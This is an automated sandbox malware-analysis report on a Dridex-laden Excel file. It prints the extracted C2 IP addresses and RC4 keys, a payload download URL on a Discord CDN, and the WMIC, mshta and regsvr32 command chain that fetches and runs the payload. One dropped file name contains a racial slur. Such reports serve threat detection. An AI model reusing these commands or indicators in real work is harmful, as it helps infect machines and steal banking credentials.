Windows Analysis Report Results12232021.xls

Overview

General Information

Sample Name: Results12232021.xls
Analysis ID: 544578
MD5: 8d1d1df2277e8730eee7de7fe28f60e1
SHA1: 773b3ff48428bdacf2afeb7fc9fd1261a2e0591c
SHA256: 4d21115441459063cf8403f94d3bb37201666be30622cb2cb4e2ffb32827192f
Tags: xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found malicious Excel 4.0 Macro
Document contains OLE streams with names of living off the land binaries
Tries to delay execution (extensive OutputDebugStringW loop)
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Regsvr32 Command Line Without DLL
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Yara detected hidden Macro 4.0 in Excel
Contains functionality to create processes via WMI
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious WMI Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Entry point lies outside standard sections
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 11.2.regsvr32.exe.72a60000.8.unpack Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}
Multi AV Scanner detection for submitted file
Source: Results12232021.xls ReversingLabs: Detection: 20%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: wntdll.pdb source: regsvr32.exe, 0000000B.00000003.593737070.000000007DE80000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593142361.0000000002700000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593332634.0000000002850000.00000004.00000001.sdmp
Source: Binary string: RFFGTEQ.pdb source: mshta.exe, 00000005.00000003.581516518.0000000006934000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121978268.0000000005D10000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.581607342.00000000069BE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1122012753.0000000006000000.00000004.00000001.sdmp, fvfnigger.bin.5.dr, WIvRRHIemuhammadismyfriend[1].bin.5.dr

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 144.91.122.102:443
Source: Malware configuration extractor IPs: 85.10.248.28:593
Source: Malware configuration extractor IPs: 185.4.135.27:5228
Source: Malware configuration extractor IPs: 80.211.3.13:8116
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TOPHOSTGR TOPHOSTGR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com.1 equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000003.00000002.576396153.0000000001BC0000.00000002.00020000.sdmp, WMIC.exe, 00000008.00000002.585430316.0000000001C00000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117795562.0000000001C60000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1117736563.0000000000800000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.1118542381.0000000004040000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118211521.0000000002030000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 0000000B.00000002.1118809244.0000000072A7F000.00000002.00020000.sdmp String found in binary or memory: http://www.baxleystamps.comDVarFileInfo$
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.1118386071.0000000003E47000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000005.00000002.1121758548.0000000005A72000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: mshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509168294461500/rebXcmuhammadismyfriend
Source: mshta.exe, 00000005.00000003.582473929.00000000002B1000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1117623632.00000000002B1000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509241996795935/iivKjRymuhammadismyfrie
Source: mshta.exe, 00000005.00000002.1121286244.0000000004EF5000.00000004.00000040.sdmp, mshta.exe, 00000005.00000003.582502016.00000000002FD000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfri
Source: mshta.exe, 00000005.00000002.1121791938.0000000005A8B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121830935.0000000005AA7000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.582518878.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin Jump to behavior
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Yara detected Dridex unpacked file
Source: Yara match File source: 11.2.regsvr32.exe.72a60000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1118714638.0000000072A61000.00000020.00020000.sdmp, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: enable content button above 4 5 6 7 8 m :0 = 11 12 lj 13 14 , d omn 15 16 17 18 wm
Found malicious Excel 4.0 Macro
Source: Results12232021.xls Macro extractor: Sheet: Macro1 contains: ShellExecuteA
Source: Results12232021.xls Macro extractor: Sheet: Macro1 contains: ShellExecuteA
Document contains OLE streams with names of living off the land binaries
Source: Results12232021.xls Stream path 'Workbook' : ........| ..........................\.p....user B.....=.....................=........J..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"#,##0_);\("$"#,##0\)..!......"$"#,##0_);[Red]\("$"#,##0\).."......"$"#,##0.00_);\("$"#,##0.00\)..'...".."$"#,##0.00_);[Red]\("$"#,##0.00\)..7.*.2.._("$"* #,##0_);_("$"* \(#,##0\);_("$"* "-"_);_(@_)....).).._(* #,##0_);_(* \(#,##0\);_(* "-"_);_(@_)..?.,.:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_)..6.+.1.._(* #,##0.00_);_(* \(#,##0.00\);_(* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...........* .......... ............ .......... .........../ .......... ............ .......... ...........+ .......... ............ .......... ............ .......... ..........., .......... .........../ .......... ............ .......... .........../ .......... ............ .......... ............ .......... ...........1 .......... ...........5 .......... ...........7 .......... ...........3 .......... ...........6 .......... ...........9 .......... ...........- .......... ............ .......... ...ff......7 ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ...........* .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... .........../ .......... ....`....... .......... ...........+ .......... ............ .......... ............ .......... ............ .......... ............ .......... ....a....... .......... ............ .........."............ ....
Source: Results12232021.xls.0.dr Stream path 'Workbook' : ........| ..........................\.p....user B.....=.....................=........J..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"#,##0_);\("$"#,##0\)..!......"$"#,##0_);[Red]\("$"#,##0\).."......"$"#,##0.00_);\("$"#,##0.00\)..'...".."$"#,##0.00_);[Red]\("$"#,##0.00\)..7.*.2.._("$"* #,##0_);_("$"* \(#,##0\);_("$"* "-"_);_(@_)....).).._(* #,##0_);_(* \(#,##0\);_(* "-"_);_(@_)..?.,.:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_)..6.+.1.._(* #,##0.00_);_(* \(#,##0.00\);_(* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...........* .......... ............ .......... .........../ .......... ............ .......... ...........+ .......... ............ .......... ............ .......... ..........., .......... .........../ .......... ............ .......... .........../ .......... ............ .......... ............ .......... ...........1 .......... ...........5 .......... ...........7 .......... ...........3 .......... ...........6 .......... ...........9 .......... ...........- .......... ............ .......... ...ff......7 ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ...........* .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... .........../ .......... ....`....... .......... ...........+ .......... ............ .......... ............ .......... ............ .......... ............ .......... ....a....... .......... ............ .........."............ ....
Found abnormal large hidden Excel 4.0 Macro sheet
Source: Results12232021.xls Macro extractor: Sheet name: Macro1 size: 5221
Source: Results12232021.xls Macro extractor: Sheet name: Macro1 size: 5221
Found Excel 4.0 Macro with suspicious formulas
Source: Results12232021.xls Initial sample: EXEC
Source: Results12232021.xls Initial sample: EXEC
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000003.00000002.576163070.0000000000330000.00000004.00000020.sdmp Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf"C:\Windows\System32\wbem\WMIC.exeWinSta0\Default
Yara signature match
Source: Results12232021.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\Results12232021.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A70730 11_2_72A70730
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A79370 11_2_72A79370
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A61494 11_2_72A61494
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A6A4E8 11_2_72A6A4E8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A68428 11_2_72A68428
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A7143C 11_2_72A7143C
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A72234 NtDelayExecution, 11_2_72A72234
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A72820 NtAllocateVirtualMemory, 11_2_72A72820
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A73294 NtProtectVirtualMemory, 11_2_72A73294
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A6BB44 NtClose, 11_2_72A6BB44
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 649C.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: Results12232021.xls Macro extractor: Sheet name: Macro1
Source: Results12232021.xls Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Document contains embedded VBA macros
Source: Results12232021.xls OLE indicator, VBA macros: true
Source: Results12232021.xls.0.dr OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Results12232021.xls ReversingLabs: Detection: 20%
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
Source: unknown Process created: C:\Windows\System32\mshta.exe mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe" process call create "mshta.exe C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD779.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@9/7@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Results12232021.xls OLE indicator, Workbook stream: true
Source: Results12232021.xls.0.dr OLE indicator, Workbook stream: true
Source: mshta.exe, 00000005.00000002.1118188277.0000000003C60000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Results12232021.xls Initial sample: OLE summary codepage = 1200
Source: Results12232021.xls Initial sample: OLE document summary codepagedoc = 1200
Source: Results12232021.xls.0.dr Initial sample: OLE summary codepage = 1200
Source: Results12232021.xls.0.dr Initial sample: OLE document summary codepagedoc = 1200
Source: Binary string: wntdll.pdb source: regsvr32.exe, 0000000B.00000003.593737070.000000007DE80000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593142361.0000000002700000.00000004.00000001.sdmp, regsvr32.exe, 0000000B.00000003.593332634.0000000002850000.00000004.00000001.sdmp
Source: Binary string: RFFGTEQ.pdb source: mshta.exe, 00000005.00000003.581516518.0000000006934000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1121978268.0000000005D10000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.581607342.00000000069BE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.1122012753.0000000006000000.00000004.00000001.sdmp, fvfnigger.bin.5.dr, WIvRRHIemuhammadismyfriend[1].bin.5.dr
Source: 649C.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A6F6A8 push esi; mov dword ptr [esp], 00000000h 11_2_72A6F6A9
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .rdata

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files to the application program directory (C:\ProgramData)
